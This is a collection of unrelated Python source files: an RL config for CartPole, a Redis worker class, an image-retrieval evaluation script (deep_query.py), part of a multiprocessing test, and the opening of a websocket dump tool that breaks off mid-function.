        # If this assert fires, then something went wrong. Either the child
        # should write into the pipe, or it should exit and the pipe should be
        # closed (which makes it become readable).
        assert readable
        try:
            # This won't block due to the above 'assert readable'.
            result = children_alive.recv()
        except EOFError:
            pass  # Test passes.
        except EnvironmentError:
            # Windows can raise BrokenPipeError. EnvironmentError is caught for
            # Python2/3 portability.
            assert sys.platform.startswith('win'), "should only raise on windows"
            # Test passes.
        else:
            # Oops, children_alive read something. It should be closed. If
            # something was read, it's a message from the child telling us they
            # are still alive!
            raise RuntimeError("unreachable: {}".format(result))
    finally:
        # Cleanup.
        children_alive.close()
|
desc_cem_classic_CartPoleV0.py | # -*- coding:utf8 -*-
# File : desc_cem_classic_CartPoleV0.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 10/08/2017
#
# This file is part of TensorArtist.
import os
import threading
import numpy as np
from tartist.app import rl
from tartist.core import get_env, get_logger
from tartist.core.utils.cache import cached_result
from tartist.core.utils.naming import get_dump_directory
from tartist.core.utils.meta import map_exec
from tartist.nn import opr as O
logger = get_logger(__file__)
# Experiment configuration, read throughout this file via get_env('...').
__envs__ = {
    'dir': {
        'root': get_dump_directory(__file__),
    },
    'cem': {
        'env_name': 'CartPole-v0',
        'top_frac': 0.2,        # fraction passed to CEMOptimizer(top_frac=...)
        'max_nr_steps': 200,    # per-episode step cap enforced by the proxy env
        'inference': {
            'nr_plays': 20      # concurrent evaluation episodes per round
        },
        'demo': {
            'nr_plays': 20      # episodes replayed in demo mode
        },
    },
    'trainer': {
        'epoch_size': 200,
        'nr_epochs': 50,
    }
}
# CEM is gradient-free, so use the evolution-based trainer.
__trainer_cls__ = rl.train.EvolutionBasedTrainer
def make_network(env):
    """Build the policy network: one fully-connected layer over the raw state."""
    with env.create_network() as net:
        obs = O.placeholder('state', shape=(None, ) + get_input_shape())
        policy_logits = O.fc('fc', obs, get_action_shape())
        net.add_output(policy_logits, name='policy')
def make_player(dump_dir=None):
    """Create the configured Gym environment, capped at the max episode length."""
    base = rl.GymRLEnviron(get_env('cem.env_name'), dump_dir=dump_dir)
    return rl.LimitLengthProxyRLEnviron(base, get_env('cem.max_nr_steps'))
def make_optimizer(env):
    """Attach a cross-entropy-method optimizer to the environment."""
    env.set_optimizer(rl.train.CEMOptimizer(env, top_frac=get_env('cem.top_frac')))
@cached_result
def get_input_shape():
    """Probe a throwaway player for the observation shape (computed once)."""
    probe = make_player()
    probe.restart()
    shape = probe.current_state.shape
    del probe  # release the environment promptly
    return shape
@cached_result
def get_action_shape():
    """The policy emits a single scalar logit."""
    return 1
def _policy2action(policy):
return int(policy > 0)
def _evaluate(player, func):
    """Play one full episode with policy `func` and return the total reward."""
    player.restart()
    total = 0
    done = False
    while not done:
        # Query the policy on the current state (batched as a single sample).
        policy = func(state=player.current_state[np.newaxis])['policy'][0]
        reward, done = player.action(_policy2action(policy))
        total += reward
    player.finish()
    return total
def main_inference_play_multithread(trainer):
    """Run several evaluation episodes concurrently and record their scores."""
    def runner():
        # Each thread compiles its own function copy and plays one episode.
        func = trainer.env.make_func()
        func.compile(trainer.env.network.outputs)
        score = _evaluate(make_player(), func)
        mgr = trainer.runtime.get('summary_histories', None)
        if mgr is not None:
            mgr.put_async_scalar('inference/score', score)

    threads = [threading.Thread(target=runner)
               for _ in range(get_env('cem.inference.nr_plays'))]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
def main_train(trainer):
    """Wire up the evaluator, logging/snapshot plugins and epoch hooks, then train."""
    # Compose the evaluator
    player = make_player()

    def evaluate_train(trainer, p=player):
        # Bind the player as a default argument so every call reuses it.
        return _evaluate(player=p, func=trainer.pred_func)
    trainer.set_evaluator(evaluate_train)

    # Register plugins
    from tartist.plugins.trainer_enhancer import summary
    summary.enable_summary_history(trainer, extra_summary_types={
        'inference/score': 'async_scalar',
    })
    summary.enable_echo_summary_scalar(trainer, summary_spec={
        'inference/score': ['avg', 'max']
    })
    from tartist.plugins.trainer_enhancer import progress
    progress.enable_epoch_progress(trainer)
    from tartist.plugins.trainer_enhancer import snapshot
    snapshot.enable_snapshot_saver(trainer, save_interval=1)

    def on_epoch_before(trainer):
        # Extra exploration std, decaying to 0 as epochs advance
        # (integer division under Python 2 -- TODO confirm target version).
        v = max(5 - trainer.epoch / 10, 0)
        trainer.optimizer.param_std += v

    def on_epoch_after(trainer):
        # Evaluate every other epoch.
        if trainer.epoch > 0 and trainer.epoch % 2 == 0:
            main_inference_play_multithread(trainer)
    trainer.register_event('epoch:before', on_epoch_before, priority=5)
    # This one should run before monitor.
    trainer.register_event('epoch:after', on_epoch_after, priority=5)
    trainer.train()
def main_demo(env, func):
    """Replay the trained policy for a few episodes, dumping output to disk."""
    dump_dir = get_env('dir.demo', os.path.join(get_env('dir.root'), 'demo'))
    logger.info('Demo dump dir: {}'.format(dump_dir))
    player = make_player(dump_dir=dump_dir)
    nr_plays = get_env('cem.demo.nr_plays', 1)

    def get_action(inp, func=func):
        # func is bound as a default argument so the closure keeps its own ref.
        return _policy2action(func(state=inp[np.newaxis])['policy'][0])

    for i in range(nr_plays):
        player.play_one_episode(get_action)
        logger.info('#{} play score={}'.format(i, player.stats['score'][-1]))
|
worker.py | import time
import datetime
import json
import redis
import threading
import sys
from logger.Logger import Logger, LOG_LEVEL
# Base Worker Class
# A worker is responsible for handling its set of operations and running on a thread
class Worker():
    """Base worker: owns a set of components and runs its main loop on a
    dedicated thread, coordinated with the main process via shared events.

    Config keys used here:
        redis          -- optional pre-built redis connection object
        topic          -- pub/sub topic (default 'mudpi'; spaces -> underscores)
        sleep_duration -- seconds between work-loop iterations (default 15)
    """

    def __init__(self, config, main_thread_running, system_ready):
        self.config = config
        try:
            self.r = config["redis"]
        except KeyError:
            # No connection supplied; fall back to a local default server.
            self.r = redis.Redis(host='127.0.0.1', port=6379)
        self.topic = config.get('topic', 'mudpi').replace(" ", "_").lower()
        self.sleep_duration = config.get('sleep_duration', 15)
        # Threading events that keep this worker in sync with the main process.
        self.main_thread_running = main_thread_running
        self.system_ready = system_ready
        self.worker_available = threading.Event()
        self.api = None
        self.components = []
        return

    def init(self):
        """Hook for subclasses to set up their components."""
        return

    def run(self):
        """Start work() on a background thread and return the thread handle."""
        t = threading.Thread(target=self.work, args=())
        t.start()
        return t

    def work(self):
        """Main loop: idle in sleep_duration steps until the main thread stops."""
        while self.main_thread_running.is_set():
            if self.system_ready.is_set():
                time.sleep(self.sleep_duration)
        # This is only ran after the main thread is shut down
        Logger.log(LOG_LEVEL["info"],
                   "Worker Shutting Down...\t\033[1;32m Complete\033[0;0m")

    def dynamic_import(self, name):
        """Import a dotted path such as 'pkg.module.ClassName' and return the
        final attribute."""
        # Split path of the class folder structure: {sensor name}_sensor . {SensorName}Sensor
        parts = name.split('.')
        # Dynamically import root of component path
        module = __import__(parts[0])
        # Walk the remaining attributes down to the requested object.
        for part in parts[1:]:
            module = getattr(module, part)
        return module

    def decode_message_data(self, message):
        """Normalize a pub/sub payload into a dict.

        Accepts dicts (returned as-is) and JSON-encoded bytes or str; anything
        undecodable is wrapped in an {'event': 'Unknown', 'data': ...} dict.
        """
        if isinstance(message, dict):
            return message
        if isinstance(message, bytes):
            text = message.decode('utf-8')
        elif isinstance(message, str):
            # Fix: a str payload previously crashed on message.decode().
            text = message
        else:
            return {'event': 'Unknown', 'data': message}
        try:
            return json.loads(text)
        except ValueError:
            # Not JSON (json.JSONDecodeError subclasses ValueError). The old
            # bare `except:` also swallowed unrelated errors like
            # KeyboardInterrupt -- catch only the decode failure.
            return {'event': 'Unknown', 'data': message}
|
deep_query.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2016 - Present, Tianwei Shen, HKUST.
# Copyright 2017 - Present, Zixin Luo, HKUST.
"""
query images and get rank lists.
evaluate oxford5k (paris6k) benchmark datasets.
"""
from __future__ import print_function
import os
import sys
import time
from random import randint
from functools import partial
from tempfile import NamedTemporaryFile
from threading import Thread
from Queue import Queue
import tensorflow as tf
from sklearn.preprocessing import normalize as sknormalize
from sklearn.decomposition import PCA
from sklearn.cluster import KMeans
import numpy as np
import progressbar
from sklearn.externals import joblib
_file_path = os.path.abspath(sys.argv[0])
_cur_dir = os.path.dirname(_file_path)
sys.path.append(os.path.dirname(_cur_dir))
from tools.common import read_list, write_list, Notify
def normalize(x, copy=False):
    """
    L2-normalize `x` row-wise via sklearn, handling the single-vector case.

    A 1-D ndarray is reshaped to one row, normalized, then squeezed back.
    NaNs (e.g. from zero-norm rows) are replaced with zeros.
    """
    is_single_vector = type(x) == np.ndarray and len(x.shape) == 1
    if is_single_vector:
        normed = sknormalize(x.reshape(1, -1), copy=copy)
        return np.nan_to_num(np.squeeze(normed), copy=copy)
    return np.nan_to_num(sknormalize(x, copy=copy), copy=copy)
def simple_query_expansion(query_feat, db_feat, result, num_regions, top_k=10):
    """
    Get the top-k closest (regional) vectors, average and re-query.

    :param query_feat: (num_query * num_regions, dim) stacked query vectors.
    :param db_feat: (num_db * num_regions, dim) stacked database vectors.
    :param result: per-query [indices, distances] ranked lists.
    :param num_regions: number of regional vectors per image.
    :param top_k: how many top results to fold into each expanded query.
    :returns: L2-normalized expanded query matrix, same shape as query_feat.
    """
    qe_feat = []
    # Floor division: query_feat stacks `num_regions` rows per query image.
    # The original `/` relied on Python 2 integer division; `//` keeps the
    # same value there and avoids range(float) breaking under Python 3.
    num_query = query_feat.shape[0] // num_regions
    for i in range(num_query):
        inds = result[i][0][0:top_k]
        dists = result[i][1][0:top_k]
        single_query = query_feat[i * num_regions:(i + 1) * num_regions]
        for j in range(len(inds)):
            # Weight each retrieved image's regional block by its score.
            weight = dists[j] / num_regions
            single_query = single_query + weight * db_feat[inds[j] * num_regions:(inds[j] + 1) * num_regions]
        qe_feat.append(single_query)
    qe_feat = np.vstack(qe_feat)
    qe_feat = normalize(qe_feat)
    return qe_feat
def get_ap(inds, query_name, index_names, groundtruth_dir, ranked_dir=None, disp_each=True):
    """
    Given a query, index data, and path to groundtruth data, perform the query,
    and evaluate average precision for the results by calling to the compute_ap
    script. Optionally save ranked results in a file.
    :param ndarray inds:
        the indices of index vectors in ascending order of distance
    :param str query_name:
        the name of the query
    :param list index_names:
        the name of index items
    :param str groundtruth_dir:
        directory of groundtruth files
    :param str ranked_dir:
        optional path to a directory to save ranked list for query
    :param bool disp_each:
        whether to print the per-query AP
    :returns float:
        the average precision for this query
    """
    if ranked_dir is not None:
        # Create dir for ranked results if needed
        if not os.path.exists(ranked_dir):
            os.makedirs(ranked_dir)
        rank_file = os.path.join(ranked_dir, '%s.txt' % query_name)
        f = open(rank_file, 'w')
    else:
        # delete=False keeps the file after close so the external program
        # can read it; it is removed manually below.
        f = NamedTemporaryFile(delete=False)
        rank_file = f.name
    f.writelines([index_names[i] + '\n' for i in inds])
    f.close()
    groundtruth_prefix = os.path.join(groundtruth_dir, query_name)
    # Shell out to the Oxford-benchmark compute_ap binary (expected to be
    # pre-built under ./cpp) and parse its stdout as the AP value.
    oxford_benchmark_prog = os.path.join('cpp', 'compute_ap')
    cmd = ' %s %s' % (groundtruth_prefix, rank_file)
    cmd = oxford_benchmark_prog + cmd
    ap = os.popen(cmd).read()
    # Delete temp file
    if ranked_dir is None:
        os.remove(rank_file)
    if disp_each:
        print(Notify.UNDERLINE, query_name, float(ap.strip()), Notify.ENDC)
    return float(ap.strip())
def _prc_match_graph(query_features, db_features, num_regions, top_k, euclidean_dist, aml):
    """TensorFlow graph for PR-MAC distance calculation.

    Returns [sorted_dist, sorted_indx]: per-query distances and database
    indices of the top_k matches. NOTE(review): `/` on int32 tensors here
    presumably floors (TF1 under Python 2) -- confirm for the TF version used.
    """
    num_regions = tf.constant(num_regions, dtype=tf.int32)
    num_query = tf.shape(query_features)[0]/num_regions
    num_db = tf.shape(db_features)[0]/num_regions
    feat_dim = tf.shape(db_features)[1]
    if euclidean_dist:
        # Precompute squared norms of all database rows once.
        norm_db = tf.reshape(tf.reduce_sum(db_features * db_features, axis=1), [-1, 1])

    def body(single_query):
        """Loop body: distances from one query's regional vectors to all db images."""
        if euclidean_dist:
            # compute L2 norm
            norm_query = tf.reshape(tf.reduce_sum(single_query * single_query, axis=1), [-1, 1])
            # distance matrix (Euclidean): ||q||^2 - 2 q.d + ||d||^2
            dist_mat = norm_query - 2 * \
                tf.matmul(single_query, db_features, transpose_b=True) + tf.transpose(norm_db)
            # Best (smallest) distance over each db image's regional vectors.
            dist_seg = tf.reduce_min(tf.reshape(dist_mat, [-1, num_regions]), axis=1)
        else:
            # Inner-product similarity; best is the largest.
            dist_mat = tf.matmul(single_query, db_features, transpose_b=True)
            dist_seg = tf.reduce_max(tf.reshape(dist_mat, [-1, num_regions]), axis=1)
        max_rv_mat = tf.reshape(dist_seg, [num_regions, num_db])
        if aml:
            # Keep only the single best regional match per db image.
            final_dist = tf.reduce_max(max_rv_mat, axis=0)
        else:
            # Sum the best matches over all query regions (PR-MAC aggregation).
            final_dist = tf.reduce_sum(max_rv_mat, axis=0)
        return final_dist

    reshape_query_features = tf.reshape(query_features, (num_query, num_regions, feat_dim))
    res_dist = tf.map_fn(lambda x: body(x), reshape_query_features, back_prop=False)
    top_k = tf.squeeze(tf.cast(top_k, tf.int32))
    if euclidean_dist:
        # top_k selects the largest values; negate to rank by smallest distance.
        sorted_dist, sorted_indx = tf.nn.top_k(-res_dist, top_k)
        sorted_dist = -sorted_dist
    else:
        sorted_dist, sorted_indx = tf.nn.top_k(res_dist, top_k, name='dist')
    sorted_indx = tf.cast(sorted_indx, tf.float32, name='rank')
    return [sorted_dist, sorted_indx]
def match_gpu(query_features, db_features, num_regions, top, euclidean_dist=False, aml=False):
    """GPU supported PR-MAC.

    Builds a fresh graph, runs the matching once, and returns a list of
    [indices, distances] pairs, one per query image.
    """
    tf.reset_default_graph()
    assert query_features.shape[1] == db_features.shape[1]
    query_features = tf.constant(query_features, dtype=tf.float32, name='query_features')
    db_features = tf.constant(db_features, dtype=tf.float32, name='db_features')
    # a weird bug with tensorflow 1.3, otherwise it is of type 'Dimension'
    num_query = int(int(query_features.shape[0]) / num_regions)
    num_db = int(int(db_features.shape[0]) / num_regions)
    # Cannot ask for more matches than there are database images.
    top_k = top
    if num_db < top:
        top_k = num_db
    config = tf.ConfigProto()
    config.gpu_options.allow_growth = True
    with tf.Session(config=config) as sess:
        tf_output = _prc_match_graph(query_features, db_features, num_regions, top_k, euclidean_dist, aml)
        sess.run(tf.global_variables_initializer())
        dist, indx = sess.run(tf_output)
    query_result = []
    for i in range(num_query):
        # Indices come back as float32 from the graph; restore int32.
        query_result.append([indx[i].astype(np.int32), dist[i]])
    return query_result
def read_feature(feature_list, euclidean_dist=False, rmac=False, mac=False, num_rv=None):
    """Read features stored in .npy.

    Loads every file in feature_list, stacks the per-image regional vectors
    into one big (len(feature_list) * num_regions, dim) matrix via a single
    consumer thread, and returns (num_regions, feature, names).
    """
    names = []
    num_regions = 1
    prog_bar = progressbar.ProgressBar()
    prog_bar.max_value = len(feature_list)
    feature = None

    def _worker(q, feature, num_regions):
        # Consumer: copies each loaded feature into its slot of the big matrix.
        while True:
            data = q.get()
            feat = data[0]
            idx = data[1]
            if feat is None or idx is None:
                # Poison pill received; stop consuming.
                return
            if False:
                # Not ready yet. KMeans or GMM to reduce regional vector number.
                if idx % 100 == 0:
                    print(idx)
                kmeans = KMeans(n_clusters=5, random_state=0).fit(feat)
                trans_feat = kmeans.cluster_centers_
                trans_feat = np.zeros([5, 512])
                for i in range(feat.shape[0]):
                    trans_feat[kmeans.labels_[i]] += feat[i]
            else:
                feature[idx * num_regions:(idx + 1) * num_regions] = feat
            q.task_done()

    q = Queue()
    worker_thread = None
    for idx, val in enumerate(feature_list):
        feat = np.load(val)
        if num_rv is not None:
            if num_rv > 0:
                # Keep only the last num_rv regional vectors.
                feat = feat[:, -num_rv:]
            else:
                # Fixed subset -- presumably one vector per pyramid level.
                feat = feat[:, (0, 5, 10)]
        feat = np.squeeze(feat)
        feat = feat.transpose()
        if rmac:
            # R-MAC: sum regional vectors into a single global descriptor.
            feat = np.sum(feat, axis=0)
        if mac:
            # MAC: keep only the first (global) vector.
            feat = feat[0,:]
        # initialization: size the output matrix from the first feature and
        # start the consumer thread.
        if feature is None:
            if len(feat.shape) == 2:
                num_regions = feat.shape[0]
                dim = feat.shape[1]
            elif len(feat.shape) == 1:
                dim = feat.shape[0]
            else:
                print(Notify.FAIL, 'Invalid feature', val, Notify.ENDC)
                exit(-1)
            feature = np.zeros([len(feature_list) * num_regions, dim])
            worker_thread = Thread(target=_worker, args=(q, feature, num_regions))
            worker_thread.daemon = True
            worker_thread.start()

        # Unused experimental helper: farthest-point sampling of regions.
        def graipher(pts, dim, K):
            def calc_distances(p0, points):
                return ((p0 - points)**2).sum(axis=1)
            farthest_pts = np.zeros((K, dim))
            farthest_pts[0] = pts[0]
            distances = calc_distances(farthest_pts[0], pts)
            for i in range(1, K):
                idx = np.argmax(distances)
                farthest_pts[i] = pts[idx]
                distances = np.minimum(distances, calc_distances(farthest_pts[i], pts))
            return farthest_pts
        # sampled_feat = graipher(feat, dim, 5)
        q.put([feat, idx])
        names.append(os.path.splitext(os.path.basename(val))[0])
        prog_bar.update(idx)
    # poison pill
    q.put([None, None])
    worker_thread.join()
    if not euclidean_dist:
        # Inner-product matching expects L2-normalized rows.
        feature = normalize(feature)
    return num_regions, feature, names
def whitening(feat, num_regions, pca_thresh=None, out_dim=None, pca=None):
    """PCA-whiten `feat` and L2-normalize the result.

    If `pca` is given it is applied as-is; otherwise a new model is fitted,
    either to a fixed `out_dim` or adaptively via `pca_thresh`.
    Returns (transformed_features, pca_model).
    """
    if pca is None:
        # compute PCA here
        if out_dim is not None:
            # reduce to specified dimention
            print(Notify.INFO, 'Reduce dimensionality to', out_dim, Notify.ENDC)
            pca = PCA(n_components=out_dim, whiten=True, copy=True, random_state=0)
        else:
            # use adaptive PCA
            print(Notify.INFO, 'Adaptive PCA with threshold', pca_thresh, Notify.ENDC)
            pca = PCA(n_components=pca_thresh, whiten=True, copy=True)
        pca.fit(feat)
        trans_feat = pca.transform(feat)
    else:
        # use pre-computed PCA
        trans_feat = pca.transform(feat)
    return normalize(trans_feat), pca
def mask_prediction(rv0, rv1, path0, path1):
    """Build 28x28 match-region masks between two images' regional vectors.

    Region indices follow a 3-level pyramid (index 0 = whole image, 1-9 = a
    3x3 grid, 10-34 = a 5x5 grid -- inferred from the scales below; confirm
    against the feature extractor).
    """
    def _get_coord_and_scale(indx):
        # Map a region index to its top-left cell and side length on the
        # 28x28 mask grid. NOTE(review): returns None for indx >= 35.
        if indx == 0:
            return (0, 0), 28
        elif indx > 0 and indx < 10:
            row = (indx - 1) / 3 * 7
            col = (indx - 1) % 3 * 7
            return (row, col), 14
        elif indx >= 10 and indx < 35:
            row = (indx - 10) / 5 * 5
            col = (indx - 10) % 5 * 5
            return (row, col), 8

    def _get_mask_map(rv0, rv1, rv_num):
        mask_map = np.zeros((28, 28), np.uint8)
        r_inds = np.zeros(rv_num, np.int32)
        r_dist = np.zeros(rv_num)
        for i in range(rv_num):
            # Best-matching region in rv1 for each region of rv0 (dot product).
            tmp = np.multiply(rv0[i], rv1).sum(axis=1)
            r_inds[i] = np.argmax(tmp)
            # Only matches above 0.90 similarity are drawn; intensity encodes
            # the pyramid level of the query region.
            if tmp[r_inds[i]] > 0.90:
                if i == 0:
                    r_dist[i] = 1
                elif i > 0 and i < 10:
                    r_dist[i] = 2
                elif i >= 10 and i < 35:
                    r_dist[i] = 3
        if r_dist[0] == 1:
            print(Notify.INFO, 'Globally similar', Notify.ENDC)
        for i in range(rv_num):
            if r_dist[i] > 0:
                coord, scale = _get_coord_and_scale(r_inds[i])
                # Paint the matched cell; level is scaled into 0-255 range.
                mask_map[coord[0]: coord[0] + scale,
                         coord[1]: coord[1] + scale] = r_dist[i] * 85
        return np.uint8(mask_map)

    rv_num = rv0.shape[0]
    mask_map0 = _get_mask_map(rv1, rv0, rv_num)
    mask_map1 = _get_mask_map(rv0, rv1, rv_num)
    # Warn(Do not move): to show mask, add
    #
    # import matplotlib.pyplot as plt
    # from scipy import misc
    #
    # and un-comment the following lines:
    #img0 = misc.imread(path0)
    #mask_map0 = misc.imresize(mask_map0, (896, 896))
    #img0[:, :, 0] = mask_map0
    #plt.subplot(121)
    #plt.imshow(img0)
    #img1 = misc.imread(path1)
    #mask_map1 = misc.imresize(mask_map1, (896, 896))
    #img1[:, :, 0] = mask_map1
    #plt.subplot(122)
    #plt.imshow(img1)
    #plt.show()
def query(query_list, feature_list, out_dir, top=200,
          pca_thresh=0.9, out_dim=None, pca_file='-1', qe_fn=None,
          mask_pred=False, euclidean_dist=False, rmac=False, mac=False, aml=False):
    """Query by list.

    Loads database (and optionally query) features, applies optional PCA
    whitening, matches on GPU, optionally expands queries, and writes the
    ranked pairs to <out_dir>/match_pairs. Returns 0.
    """
    print(Notify.INFO, 'Read feature', Notify.ENDC)
    print(Notify.INFO, 'Use R-MAC: ', rmac, Notify.ENDC)
    num_regions, db_feat, image_names = read_feature(feature_list, euclidean_dist, rmac, mac)
    # below codes are for predicted mask visualization.
    # NOTE(review): this loop never terminates -- visualization mode is meant
    # to be interrupted manually.
    itv = 10
    while mask_pred:
        idx0 = randint(itv, len(feature_list) - 1 - itv)
        idx1 = randint(idx0 - itv, idx0 + itv)
        print(Notify.INFO, 'Pair idx', (idx0, idx1), Notify.ENDC)
        # FIXME: adapt the image ext.
        image_path0 = feature_list[idx0].replace('npy', 'JPG')
        image_path1 = feature_list[idx1].replace('npy', 'JPG')
        # some images end with '.jpg'
        if not os.path.exists(image_path0):
            image_path0 = feature_list[idx0].replace('npy', 'jpg')
        if not os.path.exists(image_path1):
            image_path1 = feature_list[idx1].replace('npy', 'jpg')
        rv0 = db_feat[idx0 * num_regions:(idx0 + 1) * num_regions]
        rv1 = db_feat[idx1 * num_regions:(idx1 + 1) * num_regions]
        mask_prediction(rv0, rv1, image_path0, image_path1)
    print(Notify.INFO, '# Feature', len(feature_list), Notify.ENDC)
    print(Notify.INFO, '# Dim', db_feat.shape[-1], Notify.ENDC)
    print(Notify.INFO, '# Reginal vector', num_regions, Notify.ENDC)
    # perform PCA whitening.
    # NOTE(review): `len(image_names) > out_dim` with out_dim=None is False
    # under Python 2 but raises TypeError on Python 3 (this script targets py2).
    use_pca = (pca_thresh is not None or out_dim is not None or pca_file != '-1') and len(image_names) > out_dim
    if pca_file != '-1':
        # Reconstruct a PCA model from precomputed statistics on disk.
        pca_data = np.load(pca_file).item()
        pca = PCA(whiten=True, copy=True, random_state=0)
        pca.mean_ = pca_data['mean']
        pca.components_ = pca_data['eigvec']
        pca.explained_variance_ = pca_data['eigval']
    else:
        pca = None
    if use_pca:
        db_trans_feat, pca = whitening(db_feat, num_regions, pca_thresh, out_dim, pca=pca)
        print(Notify.INFO, 'PCA-ed feature dim', db_trans_feat.shape[1], Notify.ENDC)
    else:
        print(Notify.WARNING, 'No whitening', Notify.ENDC)
        db_trans_feat = db_feat
    if query_list is not None:
        query_num_regions, query_feat, query_names = read_feature(query_list, euclidean_dist, rmac, mac)
        assert(num_regions == query_num_regions)
        if use_pca:
            # Reuse the database PCA so both sides live in the same space.
            query_trans_feat, _ = whitening(query_feat, num_regions, pca=pca)
        else:
            query_trans_feat = query_feat
        query_num = len(query_list)
    else:
        # No separate query list: every database image queries the database.
        query_trans_feat = db_trans_feat
        query_num = len(feature_list)
    # output path name
    if not os.path.exists(out_dir):
        os.makedirs(out_dir)
    match_index_file = os.path.join(out_dir, 'match_pairs')
    print(Notify.INFO, 'Compute nn distance', Notify.ENDC)
    start = time.time()
    query_result = match_gpu(query_trans_feat, db_trans_feat, num_regions,
                             top, euclidean_dist=euclidean_dist, aml=aml)
    end = time.time()
    print(Notify.INFO, 'Time cost in matching', end - start, 's', Notify.ENDC)
    if qe_fn is not None:
        # Optional query expansion, repeated ARGS.et times (module global).
        for _ in range(ARGS.et):
            print(Notify.INFO, 'Expand queries and re-match', Notify.ENDC)
            qe_feature = qe_fn(query_trans_feat, db_trans_feat, query_result, num_regions)
            query_result = match_gpu(qe_feature, db_trans_feat, num_regions, top, aml=aml)
    content = []
    aps = []
    for i in range(query_num):
        inds = query_result[i][0]
        dists = query_result[i][1]
        # One line per (query, match) pair: "<query> <db_index> <avg_score>".
        content.extend([' '.join([str(i), str(inds[j]), str(dists[j]/num_regions)]) for j in range(len(inds))])
    write_list(content, match_index_file)
    return 0
if __name__ == '__main__':
    from argparse import ArgumentParser
    PARSER = ArgumentParser()
    PARSER.add_argument('--dataset_root', dest='dataset_root', type=str, default=None,
                        help='dataset root dir')
    PARSER.add_argument('--feature_list', dest='feature_list', type=str, required=True,
                        help='path to the feature file containing all .npy files')
    PARSER.add_argument('--query_list', dest='query_list', type=str, default=None,
                        help='path to the query list containing all .npy files')
    PARSER.add_argument('--out_dir', dest='out_dir', type=str,
                        default='./', help='optional path to save ranked output')
    PARSER.add_argument('--top', dest='top', type=int,
                        default=200, help='top match output')
    PARSER.add_argument('--pca_thresh', dest='pca_thresh',
                        type=float, default=None, help='threshold for pca')
    PARSER.add_argument('--out_dim', dest='out_dim', type=int,
                        default=None, help='dimension of final feature, control whether and how to do pca')
    PARSER.add_argument('--pca_file', dest='pca_file', type=str,
                        default='-1', help='path to pre-computed pca file')
    PARSER.add_argument('--qe', dest='qe', type=int,
                        default=None, help='perform query expansion with this many top results')
    PARSER.add_argument('--et', dest='et', type=int,
                        default=0, help='query expansion times')
    PARSER.add_argument('--mask_pred', dest='mask_pred', default=False,
                        action='store_true', help='whether to predict and visualize mask')
    PARSER.add_argument('--euclidean_dist', dest='euclidean_dist', default=False,
                        action='store_true', help='test each data set separately')
    PARSER.add_argument('--rmac', dest='rmac', default=False,
                        action='store_true', help='use r-mac instead of pr-mac when --rmac is set')
    PARSER.add_argument('--mac', dest='mac', default=False,
                        action='store_true', help='use mac --mac is set')
    PARSER.add_argument('--aml', dest='aml', default=False,
                        action='store_true', help='use aml --aml is set')
    ARGS = PARSER.parse_args()
    # Silence TensorFlow C++ logging.
    os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
    # NOTE(review): ARGS.qe defaults to None; `None > 0` is False under
    # Python 2 (this script targets py2 -- see the `Queue` import) but would
    # raise TypeError on Python 3.
    QE_FN = partial(simple_query_expansion, top_k=ARGS.qe) if ARGS.qe > 0 else None
    # read feature list
    FEATURE_LIST = read_list(ARGS.feature_list)
    if ARGS.dataset_root != None:
        FEATURE_LIST = [os.path.join(ARGS.dataset_root, p) for p in FEATURE_LIST]
    # read query_list if it's different from feature_list
    QUERY_LIST = None
    if ARGS.query_list is not None:
        QUERY_LIST = read_list(ARGS.query_list)
        if ARGS.dataset_root != None:
            QUERY_LIST = [os.path.join(ARGS.dataset_root, p) for p in QUERY_LIST]
    if not os.path.exists(ARGS.out_dir):
        os.mkdir(ARGS.out_dir)
    # compute aggregated features and run the evaluation
    mAP = query(QUERY_LIST, FEATURE_LIST, ARGS.out_dir, ARGS.top,
                ARGS.pca_thresh, ARGS.out_dim, ARGS.pca_file, QE_FN,
                ARGS.mask_pred, ARGS.euclidean_dist, ARGS.rmac, ARGS.mac, ARGS.aml)
wsdump.py | #!/Users/justin.bassett/code/exchange-bot/exchangebot/bin/python2.7
import argparse
import code
import sys
import threading
import time
import ssl
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
    """Return stdin's encoding, lower-cased; fall back to utf-8 when unknown."""
    encoding = getattr(sys.stdin, "encoding", "")
    return encoding.lower() if encoding else "utf-8"
# Frame opcodes that carry payload data (as opposed to control frames).
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
# Terminal encoding, cached once and used when re-encoding console input.
ENCODING = get_encoding()
class VAction(argparse.Action):
    """argparse action for -v: accepts no value, a number, or a 'v...' string."""

    def __call__(self, parser, args, values, option_string=None):
        # Bare -v with no argument means verbosity level 1.
        if values is None:
            values = "1"
        try:
            level = int(values)
        except ValueError:
            # Non-numeric value (e.g. extra v's): each 'v' adds one level.
            level = values.count("v") + 1
        setattr(args, self.dest, level)
def parse_args():
    """Build and parse the command-line interface of the dump tool."""
    parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
    parser.add_argument("url", metavar="ws_url",
                        help="websocket url. ex. ws://echo.websocket.org/")
    parser.add_argument("-p", "--proxy",
                        help="proxy url. ex. http://127.0.0.1:8080")
    # -v accepts either a number or repeated v's; VAction normalizes both.
    parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
                        dest="verbose",
                        help="set verbose mode. If set to 1, show opcode. "
                        "If set to 2, enable to trace websocket module")
    parser.add_argument("-n", "--nocert", action='store_true',
                        help="Ignore invalid SSL cert")
    parser.add_argument("-r", "--raw", action="store_true",
                        help="raw output")
    parser.add_argument("-s", "--subprotocols", nargs='*',
                        help="Set subprotocols")
    parser.add_argument("-o", "--origin",
                        help="Set origin")
    parser.add_argument("--eof-wait", default=0, type=int,
                        help="wait time(second) after 'EOF' received.")
    parser.add_argument("-t", "--text",
                        help="Send initial text")
    parser.add_argument("--timings", action="store_true",
                        help="Print timings in seconds")
    parser.add_argument("--headers",
                        help="Set custom headers. Use ',' as separator")
    return parser.parse_args()
class RawInput:
    """Mixin: Python 2/3-compatible prompted input with encoding normalization."""

    def raw_input(self, prompt):
        # Builtin input()/raw_input() differ between Python 3 and 2.
        if six.PY3:
            line = input(prompt)
        else:
            line = raw_input(prompt)
        # Byte input in a non-utf-8 terminal encoding is transcoded to utf-8;
        # text (unicode) input is encoded straight to utf-8 bytes.
        if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
